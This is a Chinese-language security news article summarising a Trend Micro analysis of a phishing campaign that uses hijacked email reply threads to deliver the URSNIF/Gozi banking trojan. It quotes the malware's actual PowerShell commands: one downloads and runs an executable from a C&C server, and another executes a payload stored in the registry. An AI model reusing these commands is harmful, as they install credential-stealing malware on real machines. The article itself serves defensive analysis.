攻防最前線:利用劫持郵箱回覆郵件去傳播URSNIF銀行木馬
來自網路安全公司趨勢科技(Trend Micro)的Erika Mendoza、Anjali Patil和Jay Yaneza在本週二通過一篇博文向我們介紹了一種新的網路釣魚手段,而攻擊者的最終目的是向受害者傳播知名的銀行木馬URSNIF(也被稱為Gozi,最早出現於2007年,並一直活躍於金融行業)。
根據這篇博文的描述,大多數網路釣魚活動在本質上都很簡單,並且很容易被發現——通常涉及到傳送看似合法的電子郵件,並在文字中嵌入惡意附件或連結。但是,趨勢科技在9月份觀察到的垃圾電子郵件活動表明,攻擊者正傾向於另一種更復雜的網路釣魚形式。
在這起活動中,攻擊者並沒有利用虛假的電子郵箱賬戶來新建併發送電子郵件。相反,他們使用了被劫持的賬戶,並將惡意軟體放在了對原始電子郵件的回覆中。由於這些電子郵件原本是合法的,而訊息只是作為了持續會話的一部分,因此這種特殊的手段往往十分棘手和難以察覺。
從趨勢科技目前收集到的所有資料來看,這場活動主要集中在北美和歐洲,僅有少數波及到亞洲和拉丁美洲。另外,這場活動主要針對的是與教育、金融和能源相關的機構,但也涉及到其他一些行業和機構,包括房地產、交通、製造業和政府。
分析釣魚電子郵件樣本
為了便於大家理解,我們在這裡將展示由趨勢科技提供的一個釣魚電子郵件樣本,如下圖所示:
圖1.用於回覆會話的惡意電子郵件樣本
由於電子郵件的發件人是收件人所熟悉的人,並且訊息也是會話的一部分,因此收件人很容易相信這只是對原電子郵件的一個回覆。此外,主題和語法似乎都是正確的,並且在電子郵件的末尾甚至還有簽名。
然而,如果仔細檢查就會發現電子郵件中存在一些可疑的地方。其中,最明顯的差異是語言從法語到英語的變化。此外,惡意電子郵件中的簽名與合法電子郵件中的簽名是不同的。最後,回覆是通用的,這就導致它可能與主題毫無關聯。雖然這並不意味著電子郵件就是惡意的,但至少給了我們一個危險訊號。最重要的是,這些細小的細節乍一看可能很難發現,特別是對於那些每天都會查閱大量電子郵件的人來說。
圖2.惡意電子郵件與合法電子郵件之間的對比
分析惡意軟體有效載荷
如果收件人雙擊了電子郵件中的惡意.doc附件,那麼它將呼叫Shell/">PowerShell從命令和控制(C&C)伺服器下載最新版本的URSNIF惡意軟體,然後執行下載的檔案:
powershell $VWc=new-object Net.WebClient;$wIt=’http: //t95dfesc2mo5jr. com/RTT/opanskot.php?l=targa2.tkn’.Split(‘@’);$jzK = ‘369’;$Aiz=$env:public+’\’+$jzK+’.exe’;foreach($fqd in $wIt){try{$VWc.DownloadFile($fqd, $Aiz);Invoke-Item $Aiz;break;}catch{}}
這個檔案將充當惡意軟體的主載入程式。在執行其例程之前,它將首先檢查作業系統版本。這是由於它只會在Microsoft作業系統上執行,尤其是Windows Vista及其後續版本。另一方面,它還會主動規避某些語言環境,如CN和RU。
主載入程式管理整個執行過程,並將事件記錄在文字檔案中:
%User Temp%\{temp filename}.bin
圖3.惡意軟體載入程式的日誌
主載入程式還將從C&C伺服器下載其他模組,並將它們儲存在登錄檔資料夾HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\3A861D62-51E0-15700F2219A4中。
下圖展示的是主載入程式建立的登錄檔項和包含指令碼和二進位制檔案的條目。
圖4.登錄檔項和包含指令碼和二進位制檔案的條目
請注意,雖然這些登錄檔項和一些登錄檔項名稱會因計算機不同而存在差異,但位置始終位於HKCU\Software\AppDataLow\Software\Microsoft\。
在下載元件之後,主載入程式將執行儲存在comsxRes(此名稱可能不同)中的Powershell指令碼。下面的命令列指令展示瞭如何呼叫登錄檔中的十六進位制值。
exe /C powershell invoke-expression([System.Text.Encoding]::ASCII.GetString((get-itemproperty ‘HKCU:\Software\AppDataLow\Software\Microsoft\3A861D62-51E0-7C9D-AB0E-15700F2219A4’).comsxRes
圖5. comsxRes的十六進位制值
當此指令碼載入儲存在登錄檔中的嵌入式二進位制檔案時,無檔案執行就開始了。在下圖中,趨勢科技用“–{hex-encoded binary}—”替換了二進位制資料,以顯示整段程式碼。指令碼是採用base64編碼的,以下是解碼後的結果:
圖6.儲存在登錄檔中的嵌入式二進位制檔案的程式碼
它將在建立的登錄檔項中搜索Client32或Client64,並將此程式碼注入explorer.exe以建立永續性。登錄檔中的其他條目在其後續例程中是必不可少的,因為這些條目稍後將在注入的惡意軟體程式碼中引用。例如,“TorClient”條目用於惡意軟體通過TOR網路與其C&C伺服器通訊。
分析被竊取的資訊
最終的有效載荷是一個名為Client32或Client64的DLL檔案,具體取決於主機的體系結構。有效載荷的主要目標是執行資訊竊取,具體包括以下資訊:
- 系統資訊
- 已安裝的應用程式列表
- 已安裝的驅動程式列表
- 正在執行的程序列表
- 網路裝置列表
- 外部IP地址
- 電子郵箱憑證(IMAP、POP3、SMTP)
- Cookies
- 證書
此外,它還可以錄製螢幕(.AVI),以及通過webinjects竊取財務資訊。
宣告:本文來自安全內參,版權歸作者所有。文章內容僅代表作者獨立觀點,不代表安全內參立場,轉載目的在於傳遞更多資訊。如需轉載,請聯絡原作者獲取授權。